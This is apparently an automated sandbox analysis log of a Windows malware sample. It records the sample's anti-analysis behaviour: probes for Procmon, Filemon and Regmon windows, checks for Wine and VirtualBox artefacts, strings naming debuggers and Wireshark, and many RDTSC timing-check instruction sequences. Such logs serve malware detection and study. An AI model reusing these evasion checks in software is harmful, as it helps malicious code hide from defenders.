Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeWindow searched: window name: FilemonclassJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ZN34wF8WI2.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: PROCMON.EXE
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: X64DBG.EXE
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: WINDBG.EXE
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD5E04 second address: CD5E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD5E08 second address: CD5E76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC888h 0x00000007 jc 00007F7620BAC876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F7620BAC887h 0x00000015 jp 00007F7620BAC876h 0x0000001b jmp 00007F7620BAC886h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push edi 0x00000028 pop edi 0x00000029 jmp 00007F7620BAC87Dh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD5E76 second address: CD5E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD5E7E second address: CD5E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7620BAC876h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jl 00007F7620BAC876h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD5E91 second address: CD5EA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620C9DE51h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CCF08C second address: CCF0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7620BAC885h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jbe 00007F7620BAC87Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD4FC2 second address: CD4FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD50FC second address: CD5100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD5100 second address: CD5110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 js 00007F7620C9DE50h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD8C94 second address: CD8CE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F7620BAC878h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov ecx, dword ptr [ebp+122D3A6Dh] 0x0000002c push 00000000h 0x0000002e sub dword ptr [ebp+122D2B0Ah], edi 0x00000034 push 8647F087h 0x00000039 pushad 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD8CE5 second address: CD8CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD8CEF second address: CD8D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC880h 0x00000009 popad 0x0000000a popad 0x0000000b add dword ptr [esp], 79B80FF9h 0x00000012 pushad 0x00000013 mov eax, ecx 0x00000015 mov dword ptr [ebp+122D1DBAh], edx 0x0000001b popad 0x0000001c push 00000003h 0x0000001e mov dword ptr [ebp+122D2D4Eh], esi 0x00000024 mov di, A258h 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D1DEAh], edi 0x00000030 push 00000003h 0x00000032 jne 00007F7620BAC876h 0x00000038 push 84BEA832h 0x0000003d pushad 0x0000003e jmp 00007F7620BAC886h 0x00000043 jmp 00007F7620BAC87Eh 0x00000048 popad 0x00000049 xor dword ptr [esp], 44BEA832h 0x00000050 clc 0x00000051 lea ebx, dword ptr [ebp+1244BA5Fh] 0x00000057 push esi 0x00000058 mov cx, di 0x0000005b pop edi 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F7620BAC881h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CD8D84 second address: CD8D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF9042 second address: CF904E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F7620BAC876h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CC8615 second address: CC8641 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F7620C9DE4Ah 0x0000000e jmp 00007F7620C9DE58h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF733B second address: CF736F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7620BAC88Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F7620BAC886h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7620BAC882h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF736F second address: CF7375 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF74A0 second address: CF74AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF7A1C second address: CF7A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF7A22 second address: CF7A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF7A26 second address: CF7A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF7D49 second address: CF7D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF7D4D second address: CF7D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F7620C9DE57h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CEC4CF second address: CEC4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7620BAC876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF81DB second address: CF81F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jnl 00007F7620C9DE46h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F7620C9DE46h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF81F3 second address: CF81F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF81F7 second address: CF820D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7620C9DE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F7620C9DE46h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF8AAE second address: CF8AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF8AB7 second address: CF8AC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7620C9DE46h 0x00000008 ja 00007F7620C9DE46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF8AC7 second address: CF8AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CF8AD1 second address: CF8ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CFBE8A second address: CFBE90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CFE26E second address: CFE272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CFE3DC second address: CFE3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CFE3E0 second address: CFE413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnl 00007F7620C9DE4Eh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CFE413 second address: CFE417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CFD453 second address: CFD461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE4Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CFD461 second address: CFD465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D04ADE second address: D04AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D04AE2 second address: D04AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D04AEC second address: D04AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D04AF0 second address: D04B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D04C52 second address: D04C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D04C5B second address: D04C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D04C5F second address: D04C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D052FC second address: D05300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D05300 second address: D05332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7620C9DE55h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D05332 second address: D05338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D05338 second address: D0533C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0852D second address: D08555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jmp 00007F7620BAC883h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F7620BAC876h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D08555 second address: D08569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D08569 second address: D0856E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0856E second address: D08585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F7620C9DE4Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D08872 second address: D0887D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7620BAC876h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0887D second address: D08883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D08C57 second address: D08C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F7620BAC876h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D08C6D second address: D08C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D09468 second address: D09472 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7620BAC876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D09472 second address: D0947C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D09594 second address: D0959E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D096AD second address: D096B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D096B7 second address: D096CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F7620BAC884h 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F7620BAC876h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D096CE second address: D09703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F7620C9DE48h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 adc di, 1B1Bh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jno 00007F7620C9DE48h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0A2FF second address: D0A309 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7620BAC876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0A309 second address: D0A31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE51h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0A31E second address: D0A322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0BE24 second address: D0BE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F7620C9DE4Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0C037 second address: D0C067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC889h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d je 00007F7620BAC876h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F7620BAC876h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0C067 second address: D0C0B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 movsx edi, cx 0x0000000b push 00000000h 0x0000000d mov esi, dword ptr [ebp+122D3929h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7620C9DE48h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D337Ah], eax 0x00000035 mov esi, dword ptr [ebp+122D1A31h] 0x0000003b add esi, 39F1CC12h 0x00000041 xchg eax, ebx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jng 00007F7620C9DE46h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0C0B8 second address: D0C0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0CA7A second address: D0CA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0D4BE second address: D0D525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, 4C4A2C57h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F7620BAC878h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a jbe 00007F7620BAC87Bh 0x00000030 mov esi, 7D825B73h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F7620BAC878h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D182Bh], edi 0x00000057 xchg eax, ebx 0x00000058 pushad 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0D23C second address: D0D240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0EB38 second address: D0EB3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0DDF9 second address: D0DDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D0E931 second address: D0E938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D12100 second address: D12105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CC36DE second address: CC36E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7620BAC876h 0x0000000a rdtsc
